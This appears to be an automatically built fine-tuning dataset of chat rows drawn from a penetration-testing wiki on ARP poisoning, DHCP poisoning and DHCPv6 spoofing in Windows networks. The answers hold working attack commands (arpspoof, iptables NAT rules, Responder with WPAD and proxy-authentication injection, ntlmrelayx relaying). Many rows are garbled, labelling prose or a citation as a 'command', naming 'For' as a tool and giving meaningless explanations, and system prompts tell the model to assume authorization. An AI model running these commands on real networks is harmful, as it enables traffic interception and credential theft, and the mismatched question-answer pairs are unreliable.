Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "How to execute Identify the response to the spoofed traffic and change destination IP of the target to the one of the attacker's host?", "response": "ARP spoofing (MITM)\\\nTo perform the ARP spoofing part, [arpspoof](https://github.com/ickerwx/arpspoof) (python2) is used. Both the DNS server and the firewall are poisoned ([proxy mode](arp-poisoning.md#proxy-vs.-rerouting)).", "metadata": {"corpus_index": 814, "category": "network", "source_file": "docs/src/ad/movement/mitm-and-coerced-authentications/arp-poisoning.md", "page_title": "ARP poisoning", "augmentation_kind": "none", "row_kind": "attack_command"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "What does this command do: `ARP spoofing (MITM)\\`?"}, {"role": "assistant", "content": "This command is used for identify the response to the spoofed traffic and change destination ip of the target to the one of the attacker's host. Identify the response to the spoofed traffic and change destination IP of the target to the one of the attacker's host"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "What does this command do: `ARP spoofing (MITM)\\`?", "response": "This command is used for identify the response to the spoofed traffic and change destination ip of the target to the one of the attacker's host. Identify the response to the spoofed traffic and change destination IP of the target to the one of the attacker's host", "metadata": {"corpus_index": 814, "category": "network", "source_file": "docs/src/ad/movement/mitm-and-coerced-authentications/arp-poisoning.md", "page_title": "ARP poisoning", "augmentation_kind": "none", "row_kind": "cmd_explain"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "Explain Launch the ARP poisoning"}, {"role": "assistant", "content": "arpspoof -i \"NETWORK_INTERFACE\" -t \"TARGET_IP\" -r \"FIREWALL_IP\"\n\n``\n\nFor more details about the attack, refer to the \"Combining ARP poisoning and IP spoofing to bypass firewalls\" article written by Llia Dafchev.\n\n_Nota bene:_ there are different ways of populating the NAT table regarding outgoing traffic IP translation; through the POSTROUTING chain, applied on all outgoing packets:\n\n1. MASQUERADE_:_ this will indicate that the source IP of outgoing packets should be changed to the one of the network interface specified in -o argument.\n\n`bash\niptables -t nat -A POSTROUTING -o \"NETWORK_INTERFACE\" -j MASQUERADE\n`\n\n2. SNAT_:_ this will indicate that the source IP of outgoing packets should be changed to the one specified in --to argument. Below is an example different from the one used in the attack descried above, where decision on the NAT rule to apply is based on destination (-d option) rather than the source (-s option).\n\n`bash\niptables -t nat -I POSTROUTING -d \"TARGET_IP\" -j SNAT --to \"MODIFIED_SOURCE_IP\"\n``\n\n:::"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "Explain Launch the ARP poisoning", "response": "arpspoof -i \"NETWORK_INTERFACE\" -t \"TARGET_IP\" -r \"FIREWALL_IP\"\n\n``\n\nFor more details about the attack, refer to the \"Combining ARP poisoning and IP spoofing to bypass firewalls\" article written by Llia Dafchev.\n\n_Nota bene:_ there are different ways of populating the NAT table regarding outgoing traffic IP translation; through the POSTROUTING chain, applied on all outgoing packets:\n\n1. MASQUERADE_:_ this will indicate that the source IP of outgoing packets should be changed to the one of the network interface specified in -o argument.\n\n`bash\niptables -t nat -A POSTROUTING -o \"NETWORK_INTERFACE\" -j MASQUERADE\n`\n\n2. SNAT_:_ this will indicate that the source IP of outgoing packets should be changed to the one specified in --to argument. Below is an example different from the one used in the attack descried above, where decision on the NAT rule to apply is based on destination (-d option) rather than the source (-s option).\n\n`bash\niptables -t nat -I POSTROUTING -d \"TARGET_IP\" -j SNAT --to \"MODIFIED_SOURCE_IP\"\n``\n\n:::", "metadata": {"corpus_index": 815, "category": "network", "source_file": "docs/src/ad/movement/mitm-and-coerced-authentications/arp-poisoning.md", "page_title": "ARP poisoning", "augmentation_kind": "none", "row_kind": "concept_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "What are the steps for Launch the ARP poisoning?"}, {"role": "assistant", "content": "arpspoof -i \"NETWORK_INTERFACE\" -t \"TARGET_IP\" -r \"FIREWALL_IP\"\n\n``\n\nFor more details about the attack, refer to the \"Combining ARP poisoning and IP spoofing to bypass firewalls\" article written by Llia Dafchev.\n\n_Nota bene:_ there are different ways of populating the NAT table regarding outgoing traffic IP translation; through the POSTROUTING chain, applied on all outgoing packets:\n\n1. MASQUERADE_:_ this will indicate that the source IP of outgoing packets should be changed to the one of the network interface specified in -o argument.\n\n`bash\niptables -t nat -A POSTROUTING -o \"NETWORK_INTERFACE\" -j MASQUERADE\n`\n\n2. SNAT_:_ this will indicate that the source IP of outgoing packets should be changed to the one specified in --to argument. Below is an example different from the one used in the attack descried above, where decision on the NAT rule to apply is based on destination (-d option) rather than the source (-s option).\n\n`bash\niptables -t nat -I POSTROUTING -d \"TARGET_IP\" -j SNAT --to \"MODIFIED_SOURCE_IP\"\n``\n\n:::"}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "What are the steps for Launch the ARP poisoning?", "response": "arpspoof -i \"NETWORK_INTERFACE\" -t \"TARGET_IP\" -r \"FIREWALL_IP\"\n\n``\n\nFor more details about the attack, refer to the \"Combining ARP poisoning and IP spoofing to bypass firewalls\" article written by Llia Dafchev.\n\n_Nota bene:_ there are different ways of populating the NAT table regarding outgoing traffic IP translation; through the POSTROUTING chain, applied on all outgoing packets:\n\n1. MASQUERADE_:_ this will indicate that the source IP of outgoing packets should be changed to the one of the network interface specified in -o argument.\n\n`bash\niptables -t nat -A POSTROUTING -o \"NETWORK_INTERFACE\" -j MASQUERADE\n`\n\n2. SNAT_:_ this will indicate that the source IP of outgoing packets should be changed to the one specified in --to argument. Below is an example different from the one used in the attack descried above, where decision on the NAT rule to apply is based on destination (-d option) rather than the source (-s option).\n\n`bash\niptables -t nat -I POSTROUTING -d \"TARGET_IP\" -j SNAT --to \"MODIFIED_SOURCE_IP\"\n``\n\n:::", "metadata": {"corpus_index": 815, "category": "network", "source_file": "docs/src/ad/movement/mitm-and-coerced-authentications/arp-poisoning.md", "page_title": "ARP poisoning", "augmentation_kind": "none", "row_kind": "technique_howto"}} {"messages": [{"role": "system", "content": "You are a penetration testing tool expert. Provide the exact command or sequence of commands to accomplish the task, including required flags and arguments. Format multi-step operations as numbered steps."}, {"role": "user", "content": "Show me the For command for launch the arp poisoning"}, {"role": "assistant", "content": "For more details about the attack, refer to the [\"Combining ARP poisoning and IP spoofing to bypass firewalls\" article](https://idafchev.github.io/pentest/2019/10/28/combining_arp_poisoning_and_ip_spoofing_to_bypass_firewalls.html) written by [Llia Dafchev](https://twitter.com/IliyaDafchev).\n\n_Nota bene:_ there are different ways of populating the NAT table regarding outgoing traffic IP translation; through the `POSTROUTING` chain, applied on all outgoing packets:\n\n1. `MASQUERADE`_:_ this will indicate that the source IP of outgoing packets should be changed to the one of the network interface specified in `-o` argument."}], "system": "You are a penetration testing tool expert. Provide the exact command or sequence of commands to accomplish the task, including required flags and arguments. Format multi-step operations as numbered steps.", "user": "Show me the For command for launch the arp poisoning", "response": "For more details about the attack, refer to the [\"Combining ARP poisoning and IP spoofing to bypass firewalls\" article](https://idafchev.github.io/pentest/2019/10/28/combining_arp_poisoning_and_ip_spoofing_to_bypass_firewalls.html) written by [Llia Dafchev](https://twitter.com/IliyaDafchev).\n\n_Nota bene:_ there are different ways of populating the NAT table regarding outgoing traffic IP translation; through the `POSTROUTING` chain, applied on all outgoing packets:\n\n1. `MASQUERADE`_:_ this will indicate that the source IP of outgoing packets should be changed to the one of the network interface specified in `-o` argument.", "metadata": {"corpus_index": 816, "category": "network", "source_file": "docs/src/ad/movement/mitm-and-coerced-authentications/arp-poisoning.md", "page_title": "ARP poisoning", "augmentation_kind": "none", "row_kind": "tool_command", "tool": "For"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "Walk me through Launch the ARP poisoning"}, {"role": "assistant", "content": "For more details about the attack, refer to the [\"Combining ARP poisoning and IP spoofing to bypass firewalls\" article](https://idafchev.github.io/pentest/2019/10/28/combining_arp_poisoning_and_ip_spoofing_to_bypass_firewalls.html) written by [Llia Dafchev](https://twitter.com/IliyaDafchev).\n\n_Nota bene:_ there are different ways of populating the NAT table regarding outgoing traffic IP translation; through the `POSTROUTING` chain, applied on all outgoing packets:\n\n1. `MASQUERADE`_:_ this will indicate that the source IP of outgoing packets should be changed to the one of the network interface specified in `-o` argument."}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "Walk me through Launch the ARP poisoning", "response": "For more details about the attack, refer to the [\"Combining ARP poisoning and IP spoofing to bypass firewalls\" article](https://idafchev.github.io/pentest/2019/10/28/combining_arp_poisoning_and_ip_spoofing_to_bypass_firewalls.html) written by [Llia Dafchev](https://twitter.com/IliyaDafchev).\n\n_Nota bene:_ there are different ways of populating the NAT table regarding outgoing traffic IP translation; through the `POSTROUTING` chain, applied on all outgoing packets:\n\n1. `MASQUERADE`_:_ this will indicate that the source IP of outgoing packets should be changed to the one of the network interface specified in `-o` argument.", "metadata": {"corpus_index": 816, "category": "network", "source_file": "docs/src/ad/movement/mitm-and-coerced-authentications/arp-poisoning.md", "page_title": "ARP poisoning", "augmentation_kind": "none", "row_kind": "attack_command"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "What does this command do: `For more details about the attack, refer to the [\"Combining ARP poisoning and IP spoofing to bypass firewalls\" article](https://idafchev.github.io/pentest/2019/10/28/combining_arp_poisoning_and_ip_spoofing_to_bypass_firewalls.html) written by [Llia Dafchev](https://twitter.com/IliyaDafchev).`?"}, {"role": "assistant", "content": "This command is used for launch the arp poisoning. Launch the ARP poisoning"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "What does this command do: `For more details about the attack, refer to the [\"Combining ARP poisoning and IP spoofing to bypass firewalls\" article](https://idafchev.github.io/pentest/2019/10/28/combining_arp_poisoning_and_ip_spoofing_to_bypass_firewalls.html) written by [Llia Dafchev](https://twitter.com/IliyaDafchev).`?", "response": "This command is used for launch the arp poisoning. Launch the ARP poisoning", "metadata": {"corpus_index": 816, "category": "network", "source_file": "docs/src/ad/movement/mitm-and-coerced-authentications/arp-poisoning.md", "page_title": "ARP poisoning", "augmentation_kind": "none", "row_kind": "cmd_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "Show me how to do Launch the ARP poisoning"}, {"role": "assistant", "content": "2. `SNAT`_:_ this will indicate that the source IP of outgoing packets should be changed to the one specified in `--to` argument. Below is an example different from the one used in the attack descried above, where decision on the NAT rule to apply is based on destination (`-d` option) rather than the source (`-s` option)."}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "Show me how to do Launch the ARP poisoning", "response": "2. `SNAT`_:_ this will indicate that the source IP of outgoing packets should be changed to the one specified in `--to` argument. Below is an example different from the one used in the attack descried above, where decision on the NAT rule to apply is based on destination (`-d` option) rather than the source (`-s` option).", "metadata": {"corpus_index": 817, "category": "network", "source_file": "docs/src/ad/movement/mitm-and-coerced-authentications/arp-poisoning.md", "page_title": "ARP poisoning", "augmentation_kind": "none", "row_kind": "attack_command"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "Give me an overview of DHCP poisoning - Theory"}, {"role": "assistant", "content": "When a workstation reboots or plugs into a network, a broadcast DHCP request is emitted. It's goal is to ask for network settings like an IPv4 address.\n\n> Windows uses several custom DHCP options such as NetBIOS, WINS, WPAD settings. When a workstation sends a DHCP request to get its networking settings, these additional settings can be included in the DHCP answer to facilitate straightforward connectivity and name resolution. _(__Laurent Gaffié__)_\n\nDHCP's option 252) provides Windows machines with a WPAD configuration. An attacker able to answer broadcast DHCP queries faster than the legit DHCP server can inject any network setting on the requesting client."}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "Give me an overview of DHCP poisoning - Theory", "response": "When a workstation reboots or plugs into a network, a broadcast DHCP request is emitted. It's goal is to ask for network settings like an IPv4 address.\n\n> Windows uses several custom DHCP options such as NetBIOS, WINS, WPAD settings. When a workstation sends a DHCP request to get its networking settings, these additional settings can be included in the DHCP answer to facilitate straightforward connectivity and name resolution. _(__Laurent Gaffié__)_\n\nDHCP's option 252) provides Windows machines with a WPAD configuration. An attacker able to answer broadcast DHCP queries faster than the legit DHCP server can inject any network setting on the requesting client.", "metadata": {"corpus_index": 818, "category": "network", "source_file": "docs/src/ad/movement/mitm-and-coerced-authentications/dhcp-poisoning.md", "page_title": "DHCP poisoning", "augmentation_kind": "none", "row_kind": "concept_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "Walk me through DHCP poisoning - Theory"}, {"role": "assistant", "content": "When a workstation reboots or plugs into a network, a broadcast DHCP request is emitted. It's goal is to ask for network settings like an IPv4 address.\n\n> Windows uses several custom DHCP options such as NetBIOS, WINS, WPAD settings. When a workstation sends a DHCP request to get its networking settings, these additional settings can be included in the DHCP answer to facilitate straightforward connectivity and name resolution. _(__Laurent Gaffié__)_\n\nDHCP's option 252) provides Windows machines with a WPAD configuration. An attacker able to answer broadcast DHCP queries faster than the legit DHCP server can inject any network setting on the requesting client."}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "Walk me through DHCP poisoning - Theory", "response": "When a workstation reboots or plugs into a network, a broadcast DHCP request is emitted. It's goal is to ask for network settings like an IPv4 address.\n\n> Windows uses several custom DHCP options such as NetBIOS, WINS, WPAD settings. When a workstation sends a DHCP request to get its networking settings, these additional settings can be included in the DHCP answer to facilitate straightforward connectivity and name resolution. _(__Laurent Gaffié__)_\n\nDHCP's option 252) provides Windows machines with a WPAD configuration. An attacker able to answer broadcast DHCP queries faster than the legit DHCP server can inject any network setting on the requesting client.", "metadata": {"corpus_index": 818, "category": "network", "source_file": "docs/src/ad/movement/mitm-and-coerced-authentications/dhcp-poisoning.md", "page_title": "DHCP poisoning", "augmentation_kind": "none", "row_kind": "technique_howto"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "What should I know about DHCP poisoning - Practice?"}, {"role": "assistant", "content": "Responder (Python) can be used to operate DHCP poisoning in the following manner\n\n* race against the legit DHCP server to answer DHCP REQUEST messages\n* sent a DHCP ACK response with a rogue WPAD server address in option 252 in the network parameters, with a short lease (10 seconds). Responder can also be used to attempt at injecting a DNS server instead.\n* wait the lease to expire so that the poisoned client asks for a new lease\n* let the client obtain a legitimate lease from the real DHCP server, allowing the client to obtain the right network settings and have connectivity\n* the injected WPAD server address will stay until the client reboots. If the injected field was a DNS server, it will be overwritten with the new legit DHCP lease.\n* with the injected WPAD server address, the Windows client will try to obtain the wpad.dat file on the rogue WPAD. Responder will then require the client to authenticate.\n\nThe attack can be started with the -d/--DHCP (WPAD injection) argument. By default, a rogue WPAD server will be injected in the configuration. If the additional-D/--DHCP-DNS argument is set, a rogue DNS server address will be injected in the configuration instead of a WPAD.\n\nAdditional arguments and options should be used when doing DHCP poisoning with the -d/--DHCP argument. Those options can also be used along -D/--DHCP-DNS since the WPAD DNS entry will be one of the first queries by the poisoned machine.\n\n* The -w/--wpad option to start the WPAD rogue server so that fake wpad.dat file can be served to requesting clients (i.e. WPAD spoofing)\n* The -P/--ProxyAuth option to force the Windows client to authenticate after the wpad.dat is accessed and when the client starts using the proxy\n\n```bash"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "What should I know about DHCP poisoning - Practice?", "response": "Responder (Python) can be used to operate DHCP poisoning in the following manner\n\n* race against the legit DHCP server to answer DHCP REQUEST messages\n* sent a DHCP ACK response with a rogue WPAD server address in option 252 in the network parameters, with a short lease (10 seconds). Responder can also be used to attempt at injecting a DNS server instead.\n* wait the lease to expire so that the poisoned client asks for a new lease\n* let the client obtain a legitimate lease from the real DHCP server, allowing the client to obtain the right network settings and have connectivity\n* the injected WPAD server address will stay until the client reboots. If the injected field was a DNS server, it will be overwritten with the new legit DHCP lease.\n* with the injected WPAD server address, the Windows client will try to obtain the wpad.dat file on the rogue WPAD. Responder will then require the client to authenticate.\n\nThe attack can be started with the -d/--DHCP (WPAD injection) argument. By default, a rogue WPAD server will be injected in the configuration. If the additional-D/--DHCP-DNS argument is set, a rogue DNS server address will be injected in the configuration instead of a WPAD.\n\nAdditional arguments and options should be used when doing DHCP poisoning with the -d/--DHCP argument. Those options can also be used along -D/--DHCP-DNS since the WPAD DNS entry will be one of the first queries by the poisoned machine.\n\n* The -w/--wpad option to start the WPAD rogue server so that fake wpad.dat file can be served to requesting clients (i.e. WPAD spoofing)\n* The -P/--ProxyAuth option to force the Windows client to authenticate after the wpad.dat is accessed and when the client starts using the proxy\n\n```bash", "metadata": {"corpus_index": 819, "category": "network", "source_file": "docs/src/ad/movement/mitm-and-coerced-authentications/dhcp-poisoning.md", "page_title": "DHCP poisoning", "augmentation_kind": "none", "row_kind": "concept_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "How do I perform DHCP poisoning - Practice?"}, {"role": "assistant", "content": "Responder (Python) can be used to operate DHCP poisoning in the following manner\n\n* race against the legit DHCP server to answer DHCP REQUEST messages\n* sent a DHCP ACK response with a rogue WPAD server address in option 252 in the network parameters, with a short lease (10 seconds). Responder can also be used to attempt at injecting a DNS server instead.\n* wait the lease to expire so that the poisoned client asks for a new lease\n* let the client obtain a legitimate lease from the real DHCP server, allowing the client to obtain the right network settings and have connectivity\n* the injected WPAD server address will stay until the client reboots. If the injected field was a DNS server, it will be overwritten with the new legit DHCP lease.\n* with the injected WPAD server address, the Windows client will try to obtain the wpad.dat file on the rogue WPAD. Responder will then require the client to authenticate.\n\nThe attack can be started with the -d/--DHCP (WPAD injection) argument. By default, a rogue WPAD server will be injected in the configuration. If the additional-D/--DHCP-DNS argument is set, a rogue DNS server address will be injected in the configuration instead of a WPAD.\n\nAdditional arguments and options should be used when doing DHCP poisoning with the -d/--DHCP argument. Those options can also be used along -D/--DHCP-DNS since the WPAD DNS entry will be one of the first queries by the poisoned machine.\n\n* The -w/--wpad option to start the WPAD rogue server so that fake wpad.dat file can be served to requesting clients (i.e. WPAD spoofing)\n* The -P/--ProxyAuth option to force the Windows client to authenticate after the wpad.dat is accessed and when the client starts using the proxy\n\n```bash"}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "How do I perform DHCP poisoning - Practice?", "response": "Responder (Python) can be used to operate DHCP poisoning in the following manner\n\n* race against the legit DHCP server to answer DHCP REQUEST messages\n* sent a DHCP ACK response with a rogue WPAD server address in option 252 in the network parameters, with a short lease (10 seconds). Responder can also be used to attempt at injecting a DNS server instead.\n* wait the lease to expire so that the poisoned client asks for a new lease\n* let the client obtain a legitimate lease from the real DHCP server, allowing the client to obtain the right network settings and have connectivity\n* the injected WPAD server address will stay until the client reboots. If the injected field was a DNS server, it will be overwritten with the new legit DHCP lease.\n* with the injected WPAD server address, the Windows client will try to obtain the wpad.dat file on the rogue WPAD. Responder will then require the client to authenticate.\n\nThe attack can be started with the -d/--DHCP (WPAD injection) argument. By default, a rogue WPAD server will be injected in the configuration. If the additional-D/--DHCP-DNS argument is set, a rogue DNS server address will be injected in the configuration instead of a WPAD.\n\nAdditional arguments and options should be used when doing DHCP poisoning with the -d/--DHCP argument. Those options can also be used along -D/--DHCP-DNS since the WPAD DNS entry will be one of the first queries by the poisoned machine.\n\n* The -w/--wpad option to start the WPAD rogue server so that fake wpad.dat file can be served to requesting clients (i.e. WPAD spoofing)\n* The -P/--ProxyAuth option to force the Windows client to authenticate after the wpad.dat is accessed and when the client starts using the proxy\n\n```bash", "metadata": {"corpus_index": 819, "category": "network", "source_file": "docs/src/ad/movement/mitm-and-coerced-authentications/dhcp-poisoning.md", "page_title": "DHCP poisoning", "augmentation_kind": "none", "row_kind": "technique_howto"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "Describe DNS injection in the context of penetration testing"}, {"role": "assistant", "content": "responder --interface \"eth0\" --DHCP --DHCP-DNS --wpad --ProxyAuth\nresponder -I \"eth0\" -wPdD"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "Describe DNS injection in the context of penetration testing", "response": "responder --interface \"eth0\" --DHCP --DHCP-DNS --wpad --ProxyAuth\nresponder -I \"eth0\" -wPdD", "metadata": {"corpus_index": 820, "category": "network", "source_file": "docs/src/ad/movement/mitm-and-coerced-authentications/dhcp-poisoning.md", "page_title": "DHCP poisoning", "augmentation_kind": "none", "row_kind": "concept_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "Explain the practical steps for DNS injection"}, {"role": "assistant", "content": "responder --interface \"eth0\" --DHCP --DHCP-DNS --wpad --ProxyAuth\nresponder -I \"eth0\" -wPdD"}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "Explain the practical steps for DNS injection", "response": "responder --interface \"eth0\" --DHCP --DHCP-DNS --wpad --ProxyAuth\nresponder -I \"eth0\" -wPdD", "metadata": {"corpus_index": 820, "category": "network", "source_file": "docs/src/ad/movement/mitm-and-coerced-authentications/dhcp-poisoning.md", "page_title": "DHCP poisoning", "augmentation_kind": "none", "row_kind": "technique_howto"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "Give me an overview of WPAD injection"}, {"role": "assistant", "content": "responder --interface \"eth0\" --DHCP --wpad --ProxyAuth\nresponder -I \"eth0\" -wPd\n``\n\n> [!TIP]\n> The proxy auth NTLM authentication can either be\n> \n> * forced and captured with Responder with the command line above (with --wredir and --ProxyAuth)\n> * or forced and relayed with ntlmrelayx (by using the --http-port 3128 argument\n> \n> `bash\n> responder --interface \"eth0\" --DHCP --DHCP-DNS --wpad\n> ntlmrelayx -t $target --http-port 3128\n> ``"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "Give me an overview of WPAD injection", "response": "responder --interface \"eth0\" --DHCP --wpad --ProxyAuth\nresponder -I \"eth0\" -wPd\n``\n\n> [!TIP]\n> The proxy auth NTLM authentication can either be\n> \n> * forced and captured with Responder with the command line above (with --wredir and --ProxyAuth)\n> * or forced and relayed with ntlmrelayx (by using the --http-port 3128 argument\n> \n> `bash\n> responder --interface \"eth0\" --DHCP --DHCP-DNS --wpad\n> ntlmrelayx -t $target --http-port 3128\n> ``", "metadata": {"corpus_index": 821, "category": "network", "source_file": "docs/src/ad/movement/mitm-and-coerced-authentications/dhcp-poisoning.md", "page_title": "DHCP poisoning", "augmentation_kind": "none", "row_kind": "concept_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "What are the steps for WPAD injection?"}, {"role": "assistant", "content": "responder --interface \"eth0\" --DHCP --wpad --ProxyAuth\nresponder -I \"eth0\" -wPd\n``\n\n> [!TIP]\n> The proxy auth NTLM authentication can either be\n> \n> * forced and captured with Responder with the command line above (with --wredir and --ProxyAuth)\n> * or forced and relayed with ntlmrelayx (by using the --http-port 3128 argument\n> \n> `bash\n> responder --interface \"eth0\" --DHCP --DHCP-DNS --wpad\n> ntlmrelayx -t $target --http-port 3128\n> ``"}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "What are the steps for WPAD injection?", "response": "responder --interface \"eth0\" --DHCP --wpad --ProxyAuth\nresponder -I \"eth0\" -wPd\n``\n\n> [!TIP]\n> The proxy auth NTLM authentication can either be\n> \n> * forced and captured with Responder with the command line above (with --wredir and --ProxyAuth)\n> * or forced and relayed with ntlmrelayx (by using the --http-port 3128 argument\n> \n> `bash\n> responder --interface \"eth0\" --DHCP --DHCP-DNS --wpad\n> ntlmrelayx -t $target --http-port 3128\n> ``", "metadata": {"corpus_index": 821, "category": "network", "source_file": "docs/src/ad/movement/mitm-and-coerced-authentications/dhcp-poisoning.md", "page_title": "DHCP poisoning", "augmentation_kind": "none", "row_kind": "technique_howto"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "What should I know about DHCPv6 spoofing - DHCPv6 spoofing and poisoning?"}, {"role": "assistant", "content": "By default on Windows environments, IPv6 is enabled and has priority over IPv4. Usually, IPv6 is neither used nor configured. When a Windows machine boots or gets plugged in the network, it asks for an IPv6 configuration through a DHCPv6 request. Since DHCPv6 works in multicast, attackers on the same network can answer the DHCPv6 queries and provide the clients with a specific IP config. The IP config will include a rogue DNS server address (actually, for mitm6, it will include two addresses, one IPv4 and one IPv6). This technique is called DHCPv6 spoofing.\n\nIt is worth to note that DHCPv6 spoofing can be particularly useful for carrying Kerberos relay attacks."}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "What should I know about DHCPv6 spoofing - DHCPv6 spoofing and poisoning?", "response": "By default on Windows environments, IPv6 is enabled and has priority over IPv4. Usually, IPv6 is neither used nor configured. When a Windows machine boots or gets plugged in the network, it asks for an IPv6 configuration through a DHCPv6 request. Since DHCPv6 works in multicast, attackers on the same network can answer the DHCPv6 queries and provide the clients with a specific IP config. The IP config will include a rogue DNS server address (actually, for mitm6, it will include two addresses, one IPv4 and one IPv6). This technique is called DHCPv6 spoofing.\n\nIt is worth to note that DHCPv6 spoofing can be particularly useful for carrying Kerberos relay attacks.", "metadata": {"corpus_index": 822, "category": "network", "source_file": "docs/src/ad/movement/mitm-and-coerced-authentications/dhcpv6-spoofing.md", "page_title": "DHCPv6 spoofing", "augmentation_kind": "none", "row_kind": "concept_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "Give me a guide on DHCPv6 spoofing - DHCPv6 spoofing and poisoning"}, {"role": "assistant", "content": "By default on Windows environments, IPv6 is enabled and has priority over IPv4. Usually, IPv6 is neither used nor configured. When a Windows machine boots or gets plugged in the network, it asks for an IPv6 configuration through a DHCPv6 request. Since DHCPv6 works in multicast, attackers on the same network can answer the DHCPv6 queries and provide the clients with a specific IP config. The IP config will include a rogue DNS server address (actually, for mitm6, it will include two addresses, one IPv4 and one IPv6). This technique is called DHCPv6 spoofing.\n\nIt is worth to note that DHCPv6 spoofing can be particularly useful for carrying Kerberos relay attacks."}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "Give me a guide on DHCPv6 spoofing - DHCPv6 spoofing and poisoning", "response": "By default on Windows environments, IPv6 is enabled and has priority over IPv4. Usually, IPv6 is neither used 